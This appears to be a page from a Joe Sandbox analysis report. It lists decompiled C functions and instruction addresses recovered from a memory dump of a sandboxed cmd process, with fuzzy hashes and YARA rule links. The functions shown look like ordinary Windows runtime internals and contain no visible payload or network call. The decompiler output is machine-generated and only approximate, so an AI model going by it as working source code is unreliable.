0x0373f203
0x03704a84
0x03704a88
0x03704a89
0x03704a8a
0x03704a95
0x03704a95
0x03704a79
0x03704a80
0x03704af2
0x03704af4
0x03704af9
0x03704aff
0x03704b01
0x03704b03
0x03704b08
0x0373f20a
0x0373f212
0x0373f216
0x0373f216
0x03704b08
0x03704b13
0x03704b1a
0x0373f229
0x0373f229
0x03704b1a
0x03704a82
0x00000000
0x03704a82
0x03704ab7
0x03704acd
0x03704acd
0x03704ad5
0x03704ada
0x00000000
0x03704ada
0x03704ac2
0x03704acb
0x00000000
0x00000000
0x00000000
0x03704acb
0x03704a53
0x03704a53
0x03704a58
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cffe621077f8302f8ba73a534ddd5ce33bbb3819b4501863ac0cddebfea20
Instruction ID: fafd53390f52681c2fa852da5c855279e064f4b7ef242a5104324a01d5f98937
Opcode Fuzzy Hash: be7cffe621077f8302f8ba73a534ddd5ce33bbb3819b4501863ac0cddebfea20
Instruction Fuzzy Hash: 3C312172605344DFCB21EF15C985B2AB7F8FB85604F08486DEA225F282C770D804CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 03708EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03708EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x37bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E036F4E70(0x37b86e4, 0x3709490, 0, 0);
					if( *0x37b53e8 > 5 && E03708F33(0x37b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x37b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x37b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x36abc46;
						_t48 = E03747B9C(0x37b53e8, 0x36abc46, _t67, 0x37b53e8, _t70,  &_v140);
					}
				}
				return E0370B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03708ec7
0x03708ed9
0x03708edc
0x03708ee6
0x03708ee9
0x03708eee
0x03708efc
0x03708f08
0x03741349
0x03741353
0x0374135d
0x03741366
0x0374136f
0x03741375
0x0374137c
0x03741385
0x03741390
0x03741391
0x0374139c
0x0374139d
0x037413a6
0x037413ac
0x037413b2
0x037413b5
0x037413bc
0x037413bf
0x037413c2
0x037413c5
0x037413c8
0x037413cb
0x037413ce
0x037413d1
0x037413d4
0x037413d7
0x037413da
0x037413dd
0x037413e0
0x037413e3
0x037413e6
0x037413e9
0x037413f6
0x03741400
0x03741400
0x03708f08
0x03708f32

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7bc41ec2a551c4974f0bd5640318cdd22d7959ad26b28f4b81620fb2780bd9
Instruction ID: c8fc3e45e0c08b24d3f14655a3742655c9fc06901a4918f8976bbaf6917b7c4e
Opcode Fuzzy Hash: cf7bc41ec2a551c4974f0bd5640318cdd22d7959ad26b28f4b81620fb2780bd9
Instruction Fuzzy Hash: 9941A2B1D00318EEDB20CFAAD980AADFBF4FB48310F5041AEE519A7241E7745A44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 036FE730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E036FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03709670() < 0) {
					L0371DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x37b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L036E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M036FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x036fe730
0x036fe736
0x036fe738
0x036fe73d
0x036fe73e
0x036fe740
0x036fe749
0x036fe765
0x036fe76a
0x036fe76b
0x036fe76c
0x036fe76d
0x036fe76e
0x036fe76f
0x036fe775
0x036fe777
0x036fe77e
0x0373b675
0x036fe784
0x036fe784
0x036fe789
0x036fe7a8
0x036fe7ac
0x036fe807
0x036fe7ae
0x036fe7ae
0x036fe7b1
0x036fe7b4
0x036fe7b9
0x036fe7c0
0x036fe7c4
0x036fe7ca
0x036fe7cc
0x00000000
0x036fe7d3
0x036fe7d6
0x00000000
0x00000000
0x036fe7ff
0x036fe802
0x00000000
0x00000000
0x036fe7f9
0x036fe7fc
0x00000000
0x00000000
0x036fe7f3
0x036fe7f6
0x00000000
0x00000000
0x036fe7ed
0x036fe7f0
0x00000000
0x00000000
0x036fe7e7
0x036fe7ea
0x00000000
0x00000000
0x0373b685
0x0373b688
0x00000000
0x00000000
0x0373b682
0x00000000
0x00000000
0x036fe7cc
0x036fe7d9
0x036fe7dc
0x036fe7de
0x036fe7de
0x036fe7ac
0x036fe7e4
0x036fe74b
0x036fe751
0x036fe759
0x036fe761
0x036fe761

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086ff0bca20048684388eb14a16797986562629b4f335ca48d4ffbd4446856d1
Instruction ID: 5d5459ecb7c93fad029b46912d83d6388aa012905f66465461d67adcab9aea84
Opcode Fuzzy Hash: 086ff0bca20048684388eb14a16797986562629b4f335ca48d4ffbd4446856d1
Instruction Fuzzy Hash: 60318D75A14249EFD704DF68C845F9ABBE8FB09310F148256FA14CB351E632E990CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 036FBC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E036FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x37b6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E036E2280(0xd, 0x1168f1a0);
				_t41 =  *0x37b60f8; // 0x0
				if(_t41 != 0) {
					 *0x37b60f8 =  *_t41;
					 *0x37b60fc =  *0x37b60fc + 0xffff;
				}
				E036DFFB0(_t41, 0x800, 0x1168f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x37b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L036E4620(0x37b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x37b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x036fbc36
0x036fbc42
0x036fbc45
0x036fbc4a
0x036fbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x036fbc50
0x036fbc50
0x036fbc58
0x036fbc5a
0x036fbc60
0x00000000
0x00000000
0x0373a4f2
0x0373a4f6
0x00000000
0x00000000
0x00000000
0x0373a4fc
0x036fbc79
0x036fbc7e
0x036fbc86
0x036fbd16
0x036fbd20
0x036fbd20
0x036fbc8d
0x036fbc94
0x036fbcbd
0x036fbcca
0x036fbccb
0x036fbccc
0x036fbccd
0x036fbcce
0x036fbcd4
0x036fbcea
0x036fbcee
0x036fbcf2
0x036fbd00
0x036fbd04
0x00000000
0x036fbc96
0x036fbcab
0x036fbcaf
0x036fbd2c
0x036fbd2c
0x036fbd09
0x00000000
0x036fbd09
0x036fbcb1
0x036fbcb5
0x036fbcbb
0x00000000
0x00000000
0x00000000
0x036fbcbb

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ab298257c5f3ef61b1efa6879675d71b76c257c5d16f94addbbd1690d6b265
Instruction ID: 1421f7b9663fbbdca919a7411fdbb580163d7bd60b499280972d1345ee16a3f3
Opcode Fuzzy Hash: a5ab298257c5f3ef61b1efa6879675d71b76c257c5d16f94addbbd1690d6b265
Instruction Fuzzy Hash: CF31EE36A006199FCB11EF58C4C0BA673B8EF19310F188079EE45DF205EB78D9068B84

Uniqueness

Uniqueness Score: -1.00%

Function 036C9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E036C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x379f6e8);
				E0371D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E037988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0371D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x37b86c0; // 0x2f107b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x37b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E036E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E037988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0370AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x37bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x37b84c0;
										if(_t69 >=  *0x37b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03799063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E036C922A(_t82);
							_t53 = E036E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03798B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x37b86c0; // 0x2f107b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x37b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x37b86bc;
										_t72 = 0x37b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E036C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x37b86c4;
									_t72 = 0x37b86c0;
									L18:
									E036F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x036c9100
0x036c9100
0x036c9100
0x036c9100
0x036c9102
0x036c9107
0x036c910c
0x036c9110
0x036c9115
0x036c9136
0x036c9143
0x037237e4
0x037237e4
0x036c9149
0x036c914e
0x036c914e
0x036c9117
0x036c911d
0x00000000
0x00000000
0x036c911f
0x036c9125
0x00000000
0x036c9151
0x036c9158
0x036c915d
0x036c9161
0x036c9168
0x03723715
0x00000000
0x036c916e
0x036c916e
0x036c9175
0x036c9177
0x036c917e
0x036c917f
0x036c9182
0x036c9182
0x036c9187
0x036c9187
0x036c918a
0x036c918d
0x036c918f
0x036c9192
0x036c9195
0x036c9198
0x036c9198
0x036c9198
0x036c919a
0x00000000
0x00000000
0x0372371f
0x03723721
0x03723727
0x0372372f
0x03723733
0x03723735
0x03723738
0x0372373b
0x0372373d
0x03723740
0x00000000
0x00000000
0x03723746
0x03723749
0x00000000
0x00000000
0x0372374f
0x03723751
0x00000000
0x00000000
0x03723757
0x03723759
0x0372375c
0x0372375c
0x0372375e
0x0372375e
0x03723761
0x03723764
0x00000000
0x00000000
0x03723766
0x03723768
0x037237a3
0x037237a3
0x037237a5
0x037237a7
0x037237ad
0x037237b0
0x037237b2
0x037237bc
0x037237c2
0x037237c2
0x037237b2
0x036c9187
0x036c9187
0x036c918a
0x036c918d
0x036c918f
0x036c9192
0x036c9195
0x00000000
0x036c9195
0x00000000
0x036c9187
0x0372376a
0x0372376a
0x0372376c
0x0372376c
0x0372376f
0x03723775
0x00000000
0x00000000
0x03723777
0x03723779
0x00000000
0x00000000
0x03723782
0x03723787
0x03723789
0x03723790
0x03723790
0x0372378b
0x0372378b
0x0372378b
0x03723792
0x03723795
0x03723795
0x03723798
0x03723798
0x0372379b
0x0372379b
0x036c91a3
0x036c91a9
0x036c91b0
0x036c91b4
0x036c91b4
0x036c91bb
0x036c91c0
0x036c91c5
0x036c91c7
0x037237da
0x036c91cd
0x036c91cd
0x036c91cd
0x036c91d2
0x036c91d5
0x036c9239
0x036c9239
0x036c91d7
0x036c91db
0x036c91e1
0x036c91e7
0x036c91fd
0x036c9203
0x036c921e
0x036c9223
0x00000000
0x036c9223
0x036c9205
0x036c9208
0x036c920c
0x036c9214
0x036c9214
0x036c91e9
0x036c91e9
0x036c91ee
0x036c91f3
0x036c91f3
0x036c91f3
0x036c91e7
0x00000000
0x036c91db
0x036c9187
0x036c9168

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980962f815f0580c4c357996bedbc2867f537d3b56fa7f9e5965b34847cecb6d
Instruction ID: b669e462b5289f4048e6db4dde2e3e0e498d8574d39aae7db7890e35a5767e54
Opcode Fuzzy Hash: 980962f815f0580c4c357996bedbc2867f537d3b56fa7f9e5965b34847cecb6d
Instruction Fuzzy Hash: 6A31A079A216C9EFDB25DB68C189BBCBBF5FB49314F18819EC4046B741C334A980CB56

Uniqueness

Uniqueness Score: -1.00%

Function 036F1DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E036F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E036EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L036E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E036EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x036f1dc2
0x036f1dc5
0x036f1dc7
0x036f1dcc
0x036f1dce
0x036f1dd6
0x036f1ddf
0x036f1de0
0x036f1de1
0x036f1de5
0x036f1de8
0x036f1def
0x036f1df0
0x036f1df6
0x036f1df7
0x036f1dfe
0x036f1e1a
0x00000000
0x00000000
0x036f1e0b
0x036f1e12
0x036f1e12
0x036f1e00
0x036f1e00
0x036f1e05
0x036f1e1e
0x036f1e23
0x0373570f
0x03735713
0x00000000
0x00000000
0x03735719
0x03735719
0x036f1e2c
0x036f1e2d
0x036f1e2e
0x036f1e2f
0x036f1e31
0x036f1e32
0x036f1e35
0x036f1e3d
0x03735723
0x0373573d
0x0373573d
0x00000000
0x03735723
0x036f1e49
0x036f1e4e
0x036f1e4e
0x036f1e09
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: e0203972a7a26522d84b1a3c8776f9dd60a82088330a7512d8e1051712224040
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 9521C436600219FFC721CF59CD80EABFBBDEF86694F154059FA019B210DA30AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 036E0050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E036E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x37bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E036F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0370B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03798A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E036F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x37bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x036e0055
0x036e005d
0x036e0062
0x036e006c
0x036e006f
0x036e0074
0x036e007a
0x036e007a
0x036e0080
0x036e0080
0x036e0087
0x036e008d
0x036e008f
0x036e0093
0x036e0095
0x036e009b
0x036e00f8
0x036e00fb
0x036e00fc
0x036e00ff
0x036e0108
0x036e0108
0x036e00a2
0x036e00a6
0x036e00b3
0x036e00bc
0x036e00c5
0x036e00ca
0x0372c01e
0x00000000
0x00000000
0x0372c02d
0x036e00d5
0x036e00d9
0x0372c03d
0x0372c046
0x0372c046
0x036e00df
0x036e00e2
0x036e00ea
0x036e00ef
0x036e00f2
0x036e00f6
0x036e0111
0x036e0117
0x036e0117
0x00000000
0x036e00f6
0x036e00d0
0x036e00d0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
